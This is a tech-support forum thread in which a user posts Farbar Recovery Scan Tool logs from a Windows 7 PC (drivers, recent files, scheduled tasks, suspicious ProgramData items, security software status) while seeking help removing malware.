R1 SymIRON; C:\Windows\system32\drivers\NISx64\1405000.01C\Ironx64.SYS [224416 2013-03-04] (Symantec Corporation)
R1 SYMTDIv; C:\Windows\System32\Drivers\NISx64\1405000.01C\SYMTDIV.SYS [457304 2013-04-24] (Symantec Corporation)
S3 UrlFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\wlh_amd64\UrlFilter.sys [23016 2013-03-26] (IObit.com)
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-14 09:18 - 2014-09-14 09:22 - 00000000 ____D () C:\FRST
2014-09-14 09:08 - 2014-09-14 09:08 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-09-14 08:49 - 2014-09-14 08:49 - 00262144 _____ () C:\Windows\Minidump\Mini091414-01.dmp
2014-09-14 08:48 - 2014-09-14 08:48 - 1521674558 _____ () C:\Windows\MEMORY.DMP
2014-09-14 08:45 - 2014-09-14 08:45 - 00000000 ____D () C:\a400f61a0bb2614026ab8a56ec
2014-09-14 08:36 - 2014-06-26 16:17 - 01389200 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2014-09-14 08:36 - 2014-06-26 16:17 - 00619664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardagt.exe
2014-09-14 08:36 - 2014-06-26 16:17 - 00171152 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
2014-09-14 08:36 - 2014-06-26 16:17 - 00099480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\infocardapi.dll
2014-09-14 08:36 - 2014-06-26 16:17 - 00008856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardres.dll
2014-09-14 08:36 - 2014-06-26 16:17 - 00008848 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2014-09-14 08:35 - 2014-06-05 22:29 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-09-14 08:35 - 2014-06-05 22:28 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
2014-09-14 08:10 - 2014-09-14 08:10 - 00000000 ____D () C:\ProgramData\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00001010 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Program Files (x86)\IObit
2014-09-14 08:02 - 2014-09-14 08:19 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-14 07:56 - 2014-09-14 07:57 - 00002478 _____ () C:\Users\Hogg\Desktop\FSS.txt
2014-09-13 11:01 - 2014-06-06 02:59 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2014-09-13 11:01 - 2014-06-06 01:13 - 00620032 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-09-13 11:01 - 2014-03-10 00:26 - 01869824 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2014-09-13 11:01 - 2014-03-10 00:26 - 01794560 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2014-09-13 11:01 - 2014-03-09 19:22 - 01401344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2014-09-13 11:01 - 2014-03-09 19:22 - 01248768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2014-09-13 11:01 - 2013-10-29 22:34 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll
2014-09-13 11:01 - 2013-10-29 21:55 - 00122368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys
2014-09-13 11:01 - 2013-10-29 20:33 - 00218112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\portcls.sys
2014-09-13 11:01 - 2013-10-22 03:31 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\imagehlp.dll
2014-09-13 11:01 - 2013-10-22 01:19 - 00158208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imagehlp.dll
2014-09-13 11:01 - 2013-07-07 22:20 - 00172544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-09-13 11:01 - 2013-07-07 22:16 - 00992768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-09-13 11:01 - 2013-07-07 22:16 - 00133120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-09-13 11:01 - 2013-07-07 22:16 - 00098304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2014-09-13 11:01 - 2013-07-07 22:15 - 00218624 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-09-13 11:01 - 2013-07-07 22:12 - 01276416 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-09-13 11:01 - 2013-07-07 22:12 - 00174592 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-09-13 11:01 - 2013-07-07 22:12 - 00132096 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2014-09-13 11:01 - 2013-07-03 22:21 - 00532480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comctl32.dll
2014-09-13 11:01 - 2013-07-03 22:13 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\comctl32.dll
2014-09-13 11:01 - 2013-06-28 20:25 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2014-09-13 11:01 - 2013-06-28 20:25 - 00259584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2014-09-13 11:01 - 2013-06-28 20:25 - 00095744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2014-09-13 11:01 - 2013-06-28 20:25 - 00007552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2014-09-13 11:01 - 2013-06-26 17:00 - 00785624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Wdf01000.sys
2014-09-13 11:01 - 2013-06-26 17:00 - 00054376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfLdr.sys
2014-09-13 11:01 - 2013-06-26 17:00 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\Wdfres.dll
2014-09-13 11:01 - 2013-03-07 22:18 - 00451072 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2014-09-13 11:01 - 2013-03-07 22:17 - 02425344 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-09-13 11:01 - 2013-03-07 21:52 - 02067968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-09-13 11:01 - 2012-11-21 22:22 - 00456192 _____ (Microsoft Corporation) C:\Windows\system32\shlwapi.dll
2014-09-13 11:01 - 2012-11-21 21:54 - 00353280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shlwapi.dll
2014-09-13 11:01 - 2012-11-07 22:26 - 01570816 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-09-13 11:01 - 2012-11-07 21:48 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-09-13 11:01 - 2011-05-05 08:17 - 00049664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2014-09-13 11:01 - 2011-05-05 08:17 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2014-09-13 11:00 - 2014-06-02 15:30 - 03137536 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-09-13 11:00 - 2014-06-02 15:30 - 00503296 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2014-09-13 11:00 - 2014-06-02 15:29 - 02280448 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2014-09-13 11:00 - 2014-06-02 15:29 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2014-09-13 11:00 - 2014-06-02 14:29 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2014-09-13 11:00 - 2014-06-02 04:31 - 02263552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-09-13 11:00 - 2014-06-02 04:31 - 00332800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2014-09-13 11:00 - 2014-06-02 04:30 - 01993728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2014-09-13 11:00 - 2014-05-30 01:10 - 00404992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2014-09-13 11:00 - 2013-05-01 22:16 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2014-09-13 11:00 - 2013-05-01 22:04 - 00443904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2014-09-13 11:00 - 2013-05-01 22:03 - 00037376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\printcom.dll
2014-09-13 11:00 - 2012-11-02 04:45 - 00477696 _____ (Microsoft Corporation) C:\Windows\system32\dpnet.dll
2014-09-13 11:00 - 2012-11-02 04:45 - 00068096 _____ (Microsoft Corporation) C:\Windows\system32\dpnathlp.dll
2014-09-13 11:00 - 2012-11-02 04:18 - 00376320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnet.dll
2014-09-13 11:00 - 2012-11-02 02:59 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\dpnsvr.exe
2014-09-13 11:00 - 2012-11-02 02:26 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe
2014-09-13 10:33 - 2014-09-14 09:22 - 01754820 _____ () C:\Windows\WindowsUpdate.log
2014-09-13 09:00 - 2014-09-13 09:16 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-09-13 08:54 - 2014-09-13 08:54 - 00000010 _____ () C:\0.bak
2014-09-13 08:43 - 2014-09-14 08:57 - 00000492 _____ () C:\Windows\Tasks\ParetoLogic Update Version3 Startup Task.job
2014-09-13 08:43 - 2014-09-13 09:02 - 00000440 _____ () C:\Windows\Tasks\ParetoLogic Update Version3.job
2014-09-13 08:43 - 2014-09-13 08:43 - 00003252 _____ () C:\Windows\System32\Tasks\ParetoLogic Update Version3
2014-09-13 08:43 - 2014-09-13 08:43 - 00002916 _____ () C:\Windows\System32\Tasks\ParetoLogic Update Version3 Startup Task
2014-09-13 08:02 - 2014-09-13 08:02 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-13 08:00 - 2014-09-13 09:03 - 00003358 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-13 08:00 - 2014-09-13 09:03 - 00003222 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-12 19:57 - 2014-09-14 08:48 - 00454656 _____ () C:\Windows\PFRO.log
2014-09-11 19:45 - 2014-09-14 08:01 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-11 19:45 - 2014-09-13 10:33 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-09-11 19:45 - 2014-09-11 19:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-11 19:45 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-11 19:45 - 2014-05-12 07:26 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-10 09:12 - 2014-09-10 09:12 - 00001696 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iPod
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-09-10 09:07 - 2014-09-10 09:08 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{13306464-7F21-4CB3-8898-656F1737CBDE}
2014-09-10 09:07 - 2014-09-10 09:07 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{A3C935CF-1510-4F00-9E9C-EF2EEF690822}
2014-09-07 18:53 - 2014-09-07 18:53 - 00131091 _____ () C:\Users\Hogg\Documents\French Powerpoint.pptx
2014-09-01 09:03 - 2014-09-01 09:03 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{1FCB82CA-3656-4F6D-9E00-833069C741DC}
2014-09-01 09:02 - 2014-09-01 09:02 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{5A7A28E0-64E5-4538-BCD1-3606DF5D5886}
2014-08-29 10:04 - 2014-08-29 10:05 - 00000000 ___HD () C:\ProgramData\{698E0848-6D29-4305-80DC-E8D609260CE2}
2014-08-16 10:09 - 2014-09-08 20:24 - 00000000 ____D () C:\Users\Hogg\AppData\Local\Adobe
2014-08-15 18:08 - 2014-08-15 18:09 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{7D129394-6E34-406F-921E-B97DDE291BE4}

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-14 09:22 - 2014-09-14 09:18 - 00000000 ____D () C:\FRST
2014-09-14 09:22 - 2014-09-13 10:33 - 01754820 _____ () C:\Windows\WindowsUpdate.log
2014-09-14 09:12 - 2013-10-04 09:35 - 00759982 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-09-14 09:12 - 2006-11-02 06:46 - 00784954 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-14 09:08 - 2014-09-14 09:08 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-09-14 09:05 - 2013-03-16 09:14 - 00000000 ____D () C:\Users\Hogg\AppData\Local\CrashDumps
2014-09-14 08:57 - 2014-09-13 08:43 - 00000492 _____ () C:\Windows\Tasks\ParetoLogic Update Version3 Startup Task.job
2014-09-14 08:57 - 2009-08-13 11:38 - 00003986 _____ () C:\Windows\System32\Tasks\Google Software Updater
2014-09-14 08:57 - 2009-08-13 11:38 - 00000880 _____ () C:\Windows\Tasks\Google Software Updater.job
2014-09-14 08:56 - 2009-08-13 11:50 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-14 08:55 - 2006-11-02 09:42 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-14 08:55 - 2006-11-02 09:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-14 08:55 - 2006-11-02 09:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-14 08:52 - 2006-11-02 09:42 - 00032598 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-09-14 08:49 - 2014-09-14 08:49 - 00262144 _____ () C:\Windows\Minidump\Mini091414-01.dmp
2014-09-14 08:49 - 2009-08-17 20:32 - 00000000 ____D () C:\Windows\Minidump
2014-09-14 08:49 - 2009-08-06 10:03 - 00000000 ____D () C:\Windows\SysWOW64\RTCOM
2014-09-14 08:48 - 2014-09-14 08:48 - 1521674558 _____ () C:\Windows\MEMORY.DMP
2014-09-14 08:48 - 2014-09-12 19:57 - 00454656 _____ () C:\Windows\PFRO.log
2014-09-14 08:48 - 2014-04-14 13:35 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-09-14 08:45 - 2014-09-14 08:45 - 00000000 ____D () C:\a400f61a0bb2614026ab8a56ec
2014-09-14 08:30 - 2012-12-14 10:04 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-09-14 08:21 - 2014-04-14 13:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-09-14 08:19 - 2014-09-14 08:02 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-14 08:10 - 2014-09-14 08:10 - 00000000 ____D () C:\ProgramData\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00001010 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Program Files (x86)\IObit
2014-09-14 08:02 - 2009-08-07 09:49 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-09-14 08:01 - 2014-09-11 19:45 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-14 07:57 - 2014-09-14 07:56 - 00002478 _____ () C:\Users\Hogg\Desktop\FSS.txt
2014-09-14 07:46 - 2009-08-13 11:50 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-14 07:46 - 2006-11-02 06:34 - 00000285 _____ () C:\Windows\win.ini
2014-09-14 07:42 - 2013-06-28 15:16 - 00000000 ____D () C:\Program Files (x86)\ParetoLogic
2014-09-14 07:40 - 2012-05-23 20:30 - 00000924 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000UA.job
2014-09-13 18:00 - 2013-06-30 07:53 - 00000494 _____ () C:\Windows\Tasks\Foresight Software Registration3.job
2014-09-13 18:00 - 2013-06-28 15:16 - 00000466 _____ () C:\Windows\Tasks\ParetoLogic Registration3.job
2014-09-13 16:40 - 2012-05-23 20:30 - 00000902 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000Core.job
2014-09-13 10:33 - 2014-09-11 19:45 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-09-13 09:23 - 2011-04-13 05:34 - 00000000 ____D () C:\Users\Hogg\Desktop\Aviation
2014-09-13 09:22 - 2009-10-18 20:33 - 00000000 ____D () C:\Users\Hogg\Desktop\Fitness
2014-09-13 09:16 - 2014-09-13 09:00 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-09-13 09:03 - 2014-09-13 08:00 - 00003358 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-13 09:03 - 2014-09-13 08:00 - 00003222 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-13 09:02 - 2014-09-13 08:43 - 00000440 _____ () C:\Windows\Tasks\ParetoLogic Update Version3.job
2014-09-13 09:01 - 2014-03-05 19:29 - 00000000 ____D () C:\Program Files (x86)\QuickTime
2014-09-13 09:01 - 2013-11-22 09:58 - 00000000 ____D () C:\Program Files (x86)\PasswordBox
2014-09-13 08:54 - 2014-09-13 08:54 - 00000010 _____ () C:\0.bak
2014-09-13 08:43 - 2014-09-13 08:43 - 00003252 _____ () C:\Windows\System32\Tasks\ParetoLogic Update Version3
2014-09-13 08:43 - 2014-09-13 08:43 - 00002916 _____ () C:\Windows\System32\Tasks\ParetoLogic Update Version3 Startup Task
2014-09-13 08:43 - 2013-06-28 15:16 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\ParetoLogic
2014-09-13 08:43 - 2013-06-28 15:16 - 00000000 ____D () C:\ProgramData\ParetoLogic
2014-09-13 08:02 - 2014-09-13 08:02 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-13 07:57 - 2006-11-02 09:21 - 00412128 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-09-12 21:08 - 2009-08-06 10:20 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-09-12 21:04 - 2009-08-07 11:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Games
2014-09-12 20:31 - 2012-05-31 09:19 - 00000000 ____D () C:\Users\Hogg\Desktop\Dad Stuff
2014-09-12 20:26 - 2009-08-07 09:25 - 00112704 _____ () C:\Users\Hogg\AppData\Local\GDIPFONTCACHEV1.DAT
2014-09-12 20:18 - 2013-01-18 22:30 - 00000000 ____D () C:\FlightTest5
2014-09-12 20:12 - 2013-06-17 12:09 - 00000483 _____ () C:\0
2014-09-12 20:08 - 2012-10-08 19:59 - 00000000 ____D () C:\Users\Hogg\Desktop\Court Stuff
2014-09-12 19:43 - 2009-10-05 20:32 - 00000000 ____D () C:\Users\Hogg\AppData\Local\PowerCinema
2014-09-12 19:40 - 2009-08-06 10:45 - 00000000 ____D () C:\Program Files (x86)\SMINST
2014-09-12 19:39 - 2014-08-13 08:50 - 00000000 ____D () C:\Users\Guest\AppData\Local\iLivid
2014-09-12 19:39 - 2013-08-19 09:43 - 00000000 ____D () C:\Program Files (x86)\AVG SafeGuard toolbar
2014-09-12 16:46 - 2006-11-02 09:07 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2014-09-12 12:03 - 2010-01-15 11:32 - 00000000 ____D () C:\Windows\Hewlett-Packard
2014-09-12 12:01 - 2012-11-27 23:12 - 00000000 ____D () C:\Program Files (x86)\Red Sky
2014-09-12 08:08 - 2012-12-14 10:04 - 00003682 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-12 08:08 - 2012-04-01 10:36 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-12 08:08 - 2012-02-05 12:03 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-09-11 19:45 - 2014-09-11 19:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-11 19:45 - 2012-07-31 08:59 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\Malwarebytes
2014-09-11 19:45 - 2012-07-31 08:58 - 00000943 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-11 19:45 - 2012-07-31 08:58 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-11 19:45 - 2012-07-31 08:58 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-09-11 09:57 - 2012-05-24 19:58 - 00000404 ____H () C:\Windows\Tasks\Norton Security Scan for Hogg.job
2014-09-11 07:37 - 2009-08-06 10:44 - 00000000 ____D () C:\ProgramData\Norton
2014-09-10 09:12 - 2014-09-10 09:12 - 00001696 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iPod
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-09-10 09:08 - 2014-09-10 09:07 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{13306464-7F21-4CB3-8898-656F1737CBDE}
2014-09-10 09:08 - 2009-08-07 09:19 - 00000000 ____D () C:\Users\Hogg
2014-09-10 09:07 - 2014-09-10 09:07 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{A3C935CF-1510-4F00-9E9C-EF2EEF690822}
2014-09-09 16:14 - 2012-05-24 19:58 - 00003558 _____ () C:\Windows\System32\Tasks\Norton Security Scan for Hogg
2014-09-08 20:24 - 2014-08-16 10:09 - 00000000 ____D () C:\Users\Hogg\AppData\Local\Adobe
2014-09-07 18:53 - 2014-09-07 18:53 - 00131091 _____ () C:\Users\Hogg\Documents\French Powerpoint.pptx
2014-09-01 09:03 - 2014-09-01 09:03 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{1FCB82CA-3656-4F6D-9E00-833069C741DC}
2014-09-01 09:02 - 2014-09-01 09:02 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{5A7A28E0-64E5-4538-BCD1-3606DF5D5886}
2014-08-31 10:00 - 2009-08-07 09:43 - 00000552 _____ () C:\Windows\Tasks\PCDRScheduledMaintenance.job
2014-08-29 13:01 - 2006-11-02 06:35 - 101694776 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-08-29 10:05 - 2014-08-29 10:04 - 00000000 ___HD () C:\ProgramData\{698E0848-6D29-4305-80DC-E8D609260CE2}
2014-08-29 01:48 - 2013-06-30 07:49 - 00000440 _____ () C:\Windows\Tasks\PC Helper 360.job
2014-08-25 20:17 - 2013-08-19 09:43 - 00000000 ____D () C:\Users\Hogg\AppData\Local\AVG SafeGuard toolbar
2014-08-25 06:53 - 2009-10-07 07:01 - 00270496 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-08-18 12:55 - 2010-03-28 20:39 - 00000000 ____D () C:\Users\Hogg\Desktop\Football Stuff
2014-08-15 18:09 - 2014-08-15 18:08 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{7D129394-6E34-406F-921E-B97DDE291BE4}

Files to move or delete:
====================
C:\ProgramData\7z6ge.pad
C:\ProgramData\ism_0_llatsni.pad
C:\ProgramData\ras_0oed.pad
C:\ProgramData\uninstaller.exe
C:\ProgramData\unrar.exe

Some content of TEMP:
====================
C:\Users\Hogg\AppData\Local\Temp\Update.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-09-14 08:59

==================== End Of Log ============================



BC AdBot (Login to Remove)

 


#2 mleehogg

mleehogg
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:24 AM

Posted 14 September 2014 - 10:31 AM

Here are the addition logs:

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 12-09-2014
Ran by Hogg at 2014-09-14 09:22:25
Running from C:\Users\Hogg\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FOT92IOD
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton Internet Security (Enabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
AS: Norton Internet Security (Enabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: IObit Malware Fighter (Disabled - Up to date) {A751AC20-3B48-5237-898A-78C4436BB78D}
FW: Norton Internet Security (Enabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 Update for Microsoft Office 2007 (KB2508958) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
64 Bit HP CIO Components Installer (Version: 3.2.1 - Hewlett-Packard) Hidden
6500_E709_eDocs (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709a (x32 Version: 50.0.165.000 - Hewlett-Packard) Hidden
ActiveCheck component for HP Active Support Library (x32 Version: 3.0.0.2 - Hewlett-Packard) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.1.0.4880 - Adobe Systems Incorporated) Hidden
Adobe Digital Editions (HKLM-x32\...\Digital Editions) (Version:  - )
